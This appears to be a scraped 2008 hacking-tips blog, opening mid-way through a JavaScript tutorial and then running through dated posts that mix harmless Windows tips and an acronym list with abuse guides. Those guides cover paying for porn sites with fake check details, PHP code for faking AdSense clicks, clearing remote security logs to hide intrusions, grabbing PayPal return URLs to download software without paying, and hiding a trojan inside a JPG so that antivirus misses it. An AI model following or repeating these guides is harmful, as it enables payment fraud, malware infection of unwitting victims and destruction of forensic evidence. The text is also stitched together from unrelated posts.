First 'name' is set to b0iler, then 'namenumber' is set to 1. Here is where we hit the loop, it is a while loop. What happens is while namenumber is less than 5 it does the following 3 commands inside the brackets {}: name = name + name; document.write(name); namenumber = namenumber + 1; The first statement doubles the length of 'name' by adding itself on to itself. The second statement prints 'name'. And the third statement increases 'namenumber' by 1. So since 'namenumber' goes up 1 each time through the loop, the loop will go through 4 times. After the 4th time 'namenumber' will be 5, so the statement namenumber < 5 will no longer be true.

Let me quickly go over some short cuts to standard math operators, these shortcuts are:

variable++; // adds 1 to variable.
variable--; // subtracts 1 from variable.
variable+= something; // adds something to variable. Make sure to use 's if it is a string like:
variable+= 'string';
variable-= 3; // subtracts 3 from variable
variable*= 2; // multiples variable by 2.

Next loop is the for loop. This loop is unique in that it (defines a variable; then checks if a condition is true; and finally changes a variable after each time through the loop). For the example lets say you want to do the same thing as above. This is how you would do it with a for loop:

b0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0ilerb0iler

First the variable name is defined, then it starts the for loop. It assigns 1 to namenumber, then checks if namenumber is less than 5 every time through the loop, and it increases namenumber by 1 every time through the loop (variablename++ means increase the variable by 1). The next 2 lines are the same as with the while loop. But since the for loop handles the declaration of namenumber and the increase every time through the loop it makes it simpler for the scripter and easier to keep track of for people trying to read the code. You can use a while loop if you want, it is all up to the scripter's preference.

Lets go over that for loop one more time, just for clarity. for (done only the first time; loop continues while this is true; done after every time through the loop)

That's it for learning javascript, this was really basic and pretty much covered things that are constant in most languages. For javascript specific guides check out the next section of the tutorial. This section was only to give the user enough info to understand the rest of the tutorial. I wish I could go over more, but there are way better tutorials for advanced javascript then one I could ever write.

2. Places To Learn More Advanced Javascript

I will just provide a list of tutorials and sites with more advanced javascript. If you wish to learn javascript and be able to write your own you will have to look at other people's scripts for examples and read a few more tutorials. I just went over the very basics so you wouldn't be lost.

Pagefinder - Get INSIDERinfo on thousands of topics ... rial2.html - good examples, not really advanced.. prolly a medium level javascript tutorial.

http://www.webdevelopersjournal.com/art ... ents2.html - A javascript tutorial on event handles. Fairly advanced.

Rouyer Design Portfolio Web Site - a classic site, go to the tutorials section and learn a lot of advanced javascript made easy.

http://server1.wsabstract.com/javatutors - Goes over some specific aspects to advanced javascript work. Useful in many situations.

Advanced JavaScript Tutorials - The advanced string handling and the forms tutorials are good, I would suggest reading them if you wish to get more into javascripting.

Coolnerd's Javascript Resource - A nice list of al the javascript operators, statements, objects.. although it might be alittle old I still use it all the time.

If you want to create your own javascripts for yoursite be warned. Javascripts are very limited in power, but can be the solution to many simple problems. You will have to spend a few weeks learning more advanced javascript in order to make anything really useful. Creating that awsome DHTML (Dynamic HTML) feels really good Dynamic HTML is pretty much javascript that interacts with the user, css, and layers - , , and .

Here is some links to good dynamic html sites:

The Dynamic Duo, Cross browser dynamic html tutorial - Goes over things step by step.

Taylor's dynamic HTML tutorial - That nice webmonkey style that everyone loves.

Curious Eye DHTML tutorial - This will really get you going making cross browser Dynamic HTML.

Intro to DHTML - Might be nice if you aren't as html and javascript knowledgable as most DHTML beginners.

Good luck with your adventure into javascript =)

3. Banner Busting & Killing Frames

I call it banner busting, it is when you use javascript (or other tags) that aren't rendered by the browser the same as normal html tags to get around a popup or banner that free sites automatically put on your page. The basic idea of this is to have a tag that isn't rendered as html right before the html the site adds on their banner so that user's browsers do not see the banner. There is only really one key thing you need to find out in order to kill that banner. This is what tag the site uses as a "key". What I mean by this is what tag does the banner they add come before or after? Try putting up a page with just:

text

now upload that page and view it in a browser. View the source of the page and find where the site added it's banner html. If it came after the and before the then you need to see if it came before or after the which is in between those. If it is before, then it is the tag that is the key tag which the site adds it's banner after. If it is under the than you know it puts it after the tag.

So now that we know where the site adds it's banner html what do we do to stop it? We try to make a "fake" tag and hopefully the site adds it's banner html to the fake one instead. Then we use javascript to print the real one. We can do a few things, here is the list:

the basic to stop it.

-this keytag is the real one.

If all worked out you should have a page with no annoying popups or flashing banners. If not I guess you will have to play around a little and figure it out for yourself. Since every free host uses different keytags and methods of adding it's banner I can't go over them all one by one.

I decided to go over a real example of a free site that add popup ads or banners to every page you have. I'll be using angelfire since I hate them and because that's the one I picked out of my lucky hat. Just remember that sites can change the way they add banners anytime they feel like, so this method might not work the same way as I am showing. Doing this also breaks the TOS (Terms Of Service) with your host, so you might get your site taken down without any warning. Always have complete backups of your site on your harddrive, espechially if you have a hacking site or are breaking the TOS.

angelfire

------------------------
begin
------------------------

rest of test page

------------------------
end
------------------------

as you can see angelfire puts their ad right after the tag. All they are using to protect us from getting rid of the ad is a so.. we can put something like this to defeat the ad:

So angelfire's server will add the javascript for thier advertisment after the first they see. That will put the ad after . This means that user's browsers will think that and the angelfires ad is css (cascading style sheet).. which is the

How to Break into pr0n sites that accept checks

2008-09-17T11:35:00.000-07:00

Here's how to break into *some* pr0n sites that accept checks. I know most or all CCBill sites are vulnerable to this.
NOTE: Use a proxy.

First, go to the Fedwire directory at http://www.fedwiredirectory.frb.org/search.cfm . Find a bank somewhere.
I've chosen The Bank of Clovis, in Clovis, New Mexico.
What I need is the routing number. This bank's is: 112206776

Now I need a pr0n site. For this tutorial, I'll use http://www.sapphicerotica.com .

So I head over to the Join page. It looks like they accept Online Check!
I sign up with a fake e-mail, they never confirm.

Now it takes me to the CCBill join page. I put in fake info with a real address (Mcft's). They don't verify this, either.
What is important is the billing info:
Name on account: Just make it your fake name
Routing Number: You got this from Fedwire. No hyphens are used here.
Account number: Just type a random, 7-digit number.

"Thank you for your purchase, you have been approved!"
I'm in!

A few notes:
Your account won't last long. As soon as the bank says "that info is fake", the account is gone.
This works on more than just CCBill. It doesn't work on all check-accepting processors, but I've hit at least four different processors that it does.
Not all sites accept checks, probably because of this.
If it doesn't work the first time, switch proxies, find new info, and try again.

Wi-fi Without Routers

2008-09-17T11:31:00.000-07:00

sharing your existing ethernet internet connection

1. go to control panel -> network connection.
2. right click on your ethernet connection and click on “properties”.
3. go to “advanced” tab.
4. check “allow other network….. internet connection”
5. in the drop down below select the wifi connection of your pc. if it is disabled, it will be showing your wifi connection already.
6. click on “settings”
7. check the protocols you need to share.i normally use only http and https.
8. click on “ok”.you reach the network connection page. the sharing part is now over.

finding dns server ip address.

1. click on start -> run
2. type in cmd in the run prompt
3. in the new window type “ipconfig /all” and press enter.
4. note down your dns server ip address from the screen.

configuring the wifi

1. go again to control panel -> network connections.
2. right click on your wifi connection and click “properties”.
3. go to”wireless network” tab.
4. the “use windows to configure my wireless network connection” should be checked.
5. in the preferred network connection section click on add button
6. enter a name of your wish to the network name.
7. network authentication is “open”
8. change data encryption to “disabled”
9. check the “this is a computer to computer …. not used” connection.
10. click “ok”.
11. click on general tab. select “internet protocol(tcp/ip) and click on properties button.
12. now type 192.168.0.1 in ip address, 255.255.255.0 in subnet mask, leave default gateway empty.
13. fill in the dns server entry which you had noted down earlier.
14. click on “ok” and your network is set.

your network should appear on the wifi network list now. search for wlan on your phone. connect and enjoy browsing on your phone.

Enjoy!!

Cheating AdSense (use at your own risk)

2008-09-10T07:45:00.000-07:00

This will most likely get you banned from AdSense but try if you like
create a new file.php or whatever you want to name it

paste this code in there

function rand_ip() {
$a = rand(1, 9);
$b = rand(1, 9);
$c = rand(1, 9);
$d = rand(1, 9);
$e = rand(1, 9);
$f = rand(1, 9);
$g = rand(1, 9);
$h = rand(1, 9);
return $a.$b.".".$c.$d.".".$e.".".$f.".".$g.$h;
}
$_SERVER['REMOTE_ADDR'] = rand_ip();
$ch = curl_init();
$ad_url = "Find this by viewing your page's source.";
curl_setopt($ch, CURLOPT_URL, $ad_url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
?>

Just visit the page, if you did it right it will relocate you to some advertisment page then you just go to the page again.
It counts as a click

2008-08-30T00:41:00.000-07:00

free sms sites

www.160by2.com

http://www.cellular.co.za/download_f...s_software.htm

http://www.freesms.co.za/

http://www.hotsms.com/

http://www.jfax.de/

http://www.smsfree.co.uk/

www.mobileedge.co.uk/freesms/freesms.htm

http://www.sms-sprueche.tv/

http://www.sms.mums.it/

http://www.smspup.com/

www.jump.to/freesms

http://www.awalsms.com/

www.jinny.com.lb/sms

www.cellular.co.za/send_sms2.htm

chek this site for sms spoofing

2008-08-30T00:23:00.001-07:00

www.sharpmail.co.uk

SMS from Cisco - Its Free

2008-08-30T00:15:00.000-07:00

Register youself with SMS from Cisco.Stay current with Cisco news stories, product updates, security advisories, and more. Get a text message as soon as new content is posted.

http://www.cisco.com/web/about/facts_info/sms_reg_info.html

Earlier this Service was available only in United States but, now it is also available in India too.

And Its FREE too

How hackers can erase their tracks after hacking

2008-08-28T20:11:00.000-07:00

Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.

Here are some of the techniques that an attacker can use to cover his tracks:-
(1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access.
Just point it at the victim’s system as follows:
C:\>auditpol \\192.168.10 /disable
Auditing Disabled

(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.
It is used as follows:

Elsave -s \\192.168.13.10 -1 “Security” -C

(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.

computer Acronyms

2008-08-26T23:36:00.000-07:00

ADSL - Asymmetric Digital Subscriber Line

AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft�/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ASDL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Are Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB � MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

The best firewall is?

2008-08-26T23:29:00.000-07:00

The best firewall is a hardware firewall that is completely separate from your operating system. It need not be a dedicated router, could be an old pentium box running Linux. Below I have found some sites that have How To's on setting up an outside hardware router using an old computer and using a little linux program that fits on a single floppy disk.

Brief Description:
floppyfw is a router with the advanced firewall-capabilities in Linux that fits on one single floppy disc.

Features:
Access lists, IP-masquerading (Network Address Translation), connection tracked packet filtering and (quite) advanced routing. Package for traffic shaping is also available.
Requires only a 386sx or better with two network interface cards, a 1.44MB floppy drive and 12MByte of RAM ( for less than 12M and no FPU, use the 1.0 series, which will stay maintained. )
Very simple packaging system. Is used for editors, PPP, VPN, traffic shaping and whatever comes up. (now this is looking even more like LRP (may it rest in peace) but floppyfw is not a fork.)
Logging through klogd/syslogd, both local and remote.
Serial support for console over serial port.
DHCP server and DNS cache for internal networks.

floppyfw

h#tp://www.zelow.no/floppyfw/

Sentry Firewall CD-ROM is a Linux-based bootable CDROM suitable for use as an inexpensive and easy to maintain firewall, server, or IDS(Intrusion Detection System) Node. The system is designed to be immediately configurable for a variety of different operating environments via a configuration file located on a floppy disk, a local hard drive, and/or a network via HTTP(S), FTP, SFTP, or SCP.

The Sentry Firewall CD is a complete Linux system that runs off of an initial ramdisk, much like a floppy-based system, and a CD. The default kernel is a current 2.4.x series kernel with various Netfilter patches applied. An OpenWall-patched current 2.2.x kernel is also available on the CD.

Booting from the CDROM is a fairly familiar process. The BIOS execs the bootloader(Syslinux) - which then displays a bootprompt and loads the kernel and ramdisk into memory. Once the kernel is running, the ramdisk is then mounted as root(/). At this point our configuration scripts are run(written in perl) that configure the rest of the system. It is the job of these configure scripts to put the various startup and system files into the proper location using either what is declared in the configuration file(sentry.conf) or the system defaults located in the /etc/default directory.

Most of the critical files used at boot time can be replaced with your own copy when declared in the configuration file. This is essentially how we allow the user to configure the system using his/her own configuration and init files.

All of the binaries, files, scripts, etc, used to create the CD-ROM are also available on the CD-ROM. So, with a little practice, you can easily build and customize your own bootable Sentry Firewall CD. Please see the HOWTO for more details.

Sentry Firewall

ht*p://www.sentryfirewall.com/docs.html#overview

hack those sites which link with PAYPAL- education purpose only

2008-08-26T23:25:00.001-07:00

How to hack paypal sites or how to download applications free from PayPal sites....U just
need to know a bit of HTML anyone want to download any application from da sites which r containing PayPal order page & a link to start...

First off all u need to hide ur ip-address use a proxy server otherwise ur ip address will be recorded in some sites click here to hide ur ip-address.

1) Rightclick your mouse (ctrl+click) view source and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

You can try it here to start with:
Code:
http://www.ramphelp.com/halfpipe.html

About half way down the page you will find:< type="hidden" name="return" value="http://www.ramphelp.com/65984523/thanks/68912h
p654/26865thankyouhp08363215423.html ">

Copy the link into your browser and download.

Make trojan unditectable!!

2008-08-26T12:10:00.000-07:00

This trick works only by sending a picture to someone on ICQ.
How to make this work?

1 Find a small Trojan. Best not detected by AVP.
2 Find a binder that can bind a JPG to an exe. Best not detected by AVP.
3 Rename the result file and change the icon.

1 First you must find a small Trojan to bind to the picture.
That way the size will not be too big and the receiver won`t get suspicious by long
downloading times or big picture sizes.

The best is to use a small Trojan with ICQ notify.
Then you get a notify on ICQ with IP address.
You need that to connect and to upload another Trojan that has more functions.
Many of them are out there:
MiniCommand 1.2, FC`s InCommand, Slim`s Asylum and Webasylum, WWWPW.
There are lots of them, and new ones getting available every day. Try to get an unpacked server,
so you can pack the server.
If the server is packed, it is harder for antivirus programs to detect it.
Edit the server.

Then test the server on your own computer, to see if you get an ICQ pager.
Make this work. Else edit the server again. Do not forget to remove the server afterwards.
You can do this by connecting to 127.0.0.1, your own IP.
Then give the command: "remove server".

To prevent recognition of antivirus programs you should then pack the server.
Use an exe packer or compressor for that. A lot of packers you can find on the net.
At Here you'll find some.
But the AVP also uses unpackers, so find one that is not so familiar.
A list of what AVP recognizes of Trojans and what kind of decompressing it does,
can be find here.
Then you should test the server for AVP recognition.
If AVP recognizes the server, you should try another packer, or another Trojan server.

2 The goal is that the victim sees the picture and
that the server is secretly executed at the same time.
To make one file of the server and the JPG, you use a "exe binder" or "joiner".
These ones are also recognized by AVP. So it is important to find one that is not detected.
Take a new one and try it out with AVP.
Binders you can find at here.
Not all binders do bind a JPG to an exe, so find the right one.

3 Next step is to make the result look like a JPG when you send it by ICQ.
With some binders you can change the icon. Else you can use Microangelo to edit the icon.
You can get that at download.com.
Last step is to make the .exe disappear.
You can do that by renaming the result to "me.in.the.car.without.wearing.a.bra.exe"
That way the name is too long to see the "exe".
Or rename the result like this: Mypic.jpg .exe
Put so many spaces between jpg and exe, so that the exe does not show up when you send the file.

When you get the notify you have remote control.
Remove the result.exe and upload the normal JPG instead.
Removing your traces a little.

Hack [Sify,Reliance,Others] Speed Upto 10 MBPS [Beam Cable Hack]

2008-08-25T00:18:00.001-07:00

First Download this ETHERNET Ip Sniffer called ETHERDETECT

Use the tool to Scan Ip's in your network

Keep Scanning till you get some 200 Ip's ..

Then just change the last 3 digits of your IP Address with the IP's you get In that scanner !!
NOTE:Please save your Ip address somewhere so as to get back to your original ip !

It will say "Ip conflict" error,keep trying with other Ip's untill you succeed.

Sometimes when you will change your Ip you will get same speed ...in that case ..try another ip

..:~Download Link~:..
CODE
http://rapidshare.com/files/46070425/EtherDetect_setup.exe

..:~SERIAL~:..
CODE
YW38X6HKWYT4CTK

Watch Any Movie In Paint (100%) Working

2008-08-25T00:17:00.003-07:00

* First start a movie in any player.

* Then open Paint.

* Now, in the player when the movie is being played, press "Print screen" button on your key board.

* Now, Press ctrl+v in Paint

* Leave the movie player open and don't minimize it.

* Open Paint now and see the movie in the Paint

*you can edit it also

ip locator .......find the location of a ip

2008-08-25T00:17:00.001-07:00

this is a software to find the location of the ip

link:
http://www.4shared.com/file/25808579/5856eca5/iplocator.html

Increasing options in add/remove programs

2008-08-25T00:16:00.000-07:00

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Create a Shortcut to Lock Your Computer

2008-08-25T00:15:00.002-07:00

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

How to Hide the drives(c:,d:,e:,...etc)

2008-08-25T00:15:00.001-07:00

1.Go to start->run.Type regedit.Now go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane
create a new DWORD item and name it NoDrives (it is case sensitive).
Now modify it's value and set it to 3FFFFFF (Hexadecimal) .
Now restart your Computer.
So, now when you click on My Computer, no drives will be shown(all gone...).

To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your Computer.You can now see all the drives again. Magic.......

Free Access To Websites Without Registering

2008-08-25T00:13:00.000-07:00

Go to

-http://bugmenot.com/

and type the URL of the website you want to log into.
Examples:

-http://www.nytimes.com/, -http://www.winnetmag.com/
etcetera.

Another (and better) way is changing the user agent of your browser to:
Googlebot/2.1+

-http://www.googlebot.com/bot.html

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

-http://www.chrispederick.com/work/firefox/useragentswitcher/
and add the Googlebot user agent.

chat with command prompt

2008-08-25T00:12:00.000-07:00

If you want personal chat with a friend

you don't need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press "Enter", and start chatting!

Possible "RUN" commands

2008-08-25T00:11:00.001-07:00

Possible "RUN" commands

You can access all these programs by going through START/RUN.

--> SQL Client Configuration - cliconfg
--> System Configuration Editor - sysedit
--> System Configuration Utility - msconfig
--> System File Checker Utility (Scan Immediately)- sfc /scannow
--> System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
--> System File Checker Utility (Scan On Every Boot) - sfc /scanboot
--> System File Checker Utility (Return to Default Setting)- sfc /revert
--> System File Checker Utility (Purge File Cache)- sfc /purgecache
--> System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
--> System Information - msinfo32.
--> Task Manager – taskmgr
--> System Properties - sysdm.cpl
--> TCP Tester - tcptest
--> Telnet Client - telnet
--> User Account Management- nusrmgr.cpl
--> Utility Manager - utilman
--> Windows Address Book - wab
--> Windows Address Book Import Utility - wabmig
--> Windows Backup Utility (if installed)- ntbackup
--> Windows Explorer - explorer
--> Windows Firewall- firewall.cpl
--> Windows Magnifier- magnify
--> Windows Management Infrastructure - wmimgmt.msc
--> Windows Media Player - wmplayer
--> Windows Messenger - msmsgs
--> Windows Picture Import Wizard (need camera connected)- wiaacmgr
--> Windows System Security Tool – syskey
--> Windows Update Launches - wupdmgr
--> Windows Version (to show which version of windows)- winver
--> Windows XP Tour Wizard - tourstart
--> Wordpad - write--> Password Properties - password.cpl
--> Performance Monitor - perfmon.msc
--> Phone and Modem Options - telephon.cpl
--> Phone Dialer - dialer
--> Pinball Game - pinball
--> Power Configuration - powercfg.cpl
--> Printers and Faxes - control printers
--> Printers Folder – printers
--> Private Character Editor - eudcedit
--> Quicktime (If Installed)- QuickTime.cpl
--> Real Player (if installed)- realplay
--> Regional Settings - intl.cpl
--> Registry Editor - regedit
--> Registry Editor - regedit32
--> Remote Access Phonebook - rasphone
--> Remote Desktop - mstsc
--> Removable Storage - ntmsmgr.msc
--> Removable Storage Operator Requests - ntmsoprq.msc
--> Resultant Set of Policy (XP Prof) - rsop.msc
--> Scanners and Cameras - sticpl.cpl
--> Scheduled Tasks - control schedtasks
--> Security Center - wscui.cpl
--> Services - services.msc
--> Shared Folders - fsmgmt.msc
--> Shuts Down Windows - shutdown
--> Sounds and Audio - mmsys.cpl
--> Spider Solitare Card Game - spider
--> Malicious Software Removal Tool - mrt
--> Microsoft Access (if installed) - access.cpl
--> Microsoft Chat - winchat
--> Microsoft Excel (if installed) - excel
--> Microsoft Frontpage (if installed)- frontpg
--> Microsoft Movie Maker - moviemk
--> Microsoft Paint - mspaint
--> Microsoft Powerpoint (if installed)- powerpnt
--> Microsoft Word (if installed)- winword
--> Microsoft Syncronization Tool - mobsync
--> Minesweeper Game - winmine
--> Mouse Properties - control mouse
--> Mouse Properties - main.cpl
--> Nero (if installed)- nero
--> Netmeeting - conf
--> Network Connections - control netconnections
--> Network Connections - ncpa.cpl
--> Network Setup Wizard - netsetup.cpl
--> Notepad - notepad
--> Nview Desktop Manager (If Installed)- nvtuicpl.cpl
--> Object Packager - packager
--> ODBC Data Source Administrator- odbccp32.cpl
--> On Screen Keyboard - osk
--> Opens AC3 Filter (If Installed) - ac3filter.cpl
--> Outlook Express - msimn
--> Paint – pbrush
--> Keyboard Properties - control keyboard
--> IP Configuration (Display Connection Configuration) - ipconfi/all
--> IP Configuration (Display DNS Cache Contents)- ipconfig /displaydns
--> IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
--> IP Configuration (Release All Connections)- ipconfig /release
--> IP Configuration (Renew All Connections)- ipconfig /renew
--> IP Configuration(RefreshesDHCP&Re-RegistersDNS)-ipconfig/registerdns
--> IP Configuration (Display DHCP Class ID)- ipconfig/showclassid
--> IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
--> Java Control Panel (If Installed)- jpicpl32.cpl
--> Java Control Panel (If Installed)- javaws
--> Local Security Settings - secpol.msc
--> Local Users and Groups - lusrmgr.msc
--> Logs You Out Of Windows - logoff.....
--> Accessibility Controls - access.cpl
--> Accessibility Wizard - accwiz
--> Add Hardware - Wizardhdwwiz.cpl
--> Add/Remove Programs - appwiz.cpl
--> Administrative Tools control - admintools
--> Adobe Acrobat (if installed) - acrobat
--> Adobe Designer (if installed)- acrodist
--> Adobe Distiller (if installed)- acrodist
--> Adobe ImageReady (if installed)- imageready
--> Adobe Photoshop (if installed)- photoshop
--> Automatic Updates - wuaucpl.cpl
--> Bluetooth Transfer Wizard – fsquirt
--> Calculator - calc
--> Certificate Manager - certmgr.msc
--> Character Map - charmap
--> Check Disk Utility - chkdsk
--> Clipboard Viewer - clipbrd
--> Command Prompt - cmd
--> Component Services - dcomcnfg
--> Computer Management - compmgmt.msc
--> Control Panel - control
--> Date and Time Properties - timedate.cpl
--> DDE Shares - ddeshare
--> Device Manager - devmgmt.msc
--> Direct X Control Panel (If Installed)- directx.cpl
--> Direct X Troubleshooter- dxdiag
--> Disk Cleanup Utility- cleanmgr
--> Disk Defragment- dfrg.msc
--> Disk Management- diskmgmt.msc
